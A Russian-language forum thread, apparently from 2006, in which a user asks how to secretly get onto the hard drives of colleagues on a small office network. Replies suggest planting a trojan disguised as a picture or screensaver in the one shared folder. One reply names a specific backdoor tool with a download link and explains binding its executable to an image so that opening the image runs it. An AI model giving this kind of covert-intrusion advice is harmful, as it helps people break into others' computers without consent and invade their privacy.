Взлом локальной сети У меня поставели сеть пока на 10 человек,я их компы вижу в сетевом окружении,но дальше не пускает,кроме одного,у него можно зайти в Мои документы и всё. Может кто знает какие нибудь проги,которые позволят попасть на ихнии компы?!
LAS, дыкть эта, пройдись по компам и на каждом сделаю такую процедуру - заходишь в проводник, вызываешь свойства диска(ну там С: ) далее идешь во вкладку доступ, там выбираешь галочку "открыть общий доступ к этой папке".. и все.. будет те полный доступ по сети к компу
EZJ, ты не понял! Я как раз не могу так сделать(по компам пройтись). А группа у всех одна! Мне надо как нибудь попасть к ним на жёские диски и чтоб ни кто не знал! Это вообще возможно?
LAS, ну можно как нибудь заскочить к этому челу, и открыть доступ... пока до него это дойдет думаю много времени пройдет... ну или в сети поискать троянчик который открывает доступ, хотя даже не зна есть ли такие...
EZJ, да, я тож про троян подумал. LAS, у них антивири стоят? А тому парню, у которого МоиДок открыты в папку трояна кинь, тока замаскируй под картинку или скринсейвер... Мож не спалит. Если получится, то получишь полный доступ к его HDD
LAS, ну для начала подойдет AntiLamer Backdoor 2.0. foont.ucoz.ru/alb20.rar Почитай readme в архиве. Соль в том, что ты настраиваешь exe-шник, который ты подкинешь "другу". Можно склеить его к картиной. Открытие картинки повлечет за собой выполнение злостного кода...
ts 11 мая 2006 в 22:51
У меня поставели сеть пока на 10 человек,я их компы вижу в сетевом окружении,но дальше не пускает,кроме одного,у него можно зайти в Мои документы и всё. Может кто знает какие нибудь проги,которые позволят попасть на ихнии компы?!